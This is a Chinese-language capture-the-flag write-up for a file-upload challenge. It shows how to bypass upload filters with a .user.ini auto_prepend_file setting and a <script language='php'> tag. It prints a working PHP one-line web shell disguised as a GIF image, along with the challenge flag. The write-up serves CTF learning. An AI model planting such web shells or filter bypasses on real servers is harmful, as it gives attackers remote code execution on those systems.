这题依旧不是自己做出来的,难过的是没做出来,值得高兴的是掌握了新姿势
进入页面叫你上传文件,肯定就是文件上传漏洞,所以我就开始逐个试
1. 发现.htaccess文件传不了
2. 含有 <? 的文件传不了
首先先解决第一个问题:
一.如果.htaccess文件传不了以我现有的知识只有两个方法:
1.传输.jpg文件,但是内容只含有一句话木马,可以直接连接菜刀
2.依靠CGI解析漏洞,简单来说就是原来访问1.jpg是图片,但是访问1.jpg/.php就是php文件了
但是现有知识解决不了,于是有一个新的姿势:
那就是.user.ini文件(这也是一种配置文件)
这个文件有什么用呢,就是把你指定的文件当作php执行
---------------------------------------------------
那么第二个问题:
<?文件 不能传
试试这样 写一句话木马:
<script language='php'>eval($_REQUEST[8]);</script>
---------------------------------------------------
于是解决这两个问题,可以开始解题
这是.user.ini的文件内容:
GIF89a
auto_prepend_file=shell.jpg(你传入的木马图片的名称)
这是shell.jpg的内容
GIF89a
<script language='php'>eval($_REQUEST[8]);</script>
然后分别把两个文件上传
然后访问uploads/cc551ab005b2e60fbdc88de809b2c4b1/index.php让他解析我们的文件
再访问uploads/cc551ab005b2e60fbdc88de809b2c4b1
可以发现
于是就可以连接菜刀,拿到flag
flag{ccde253f-d5ba-4742-9bce-40624c4af6a5}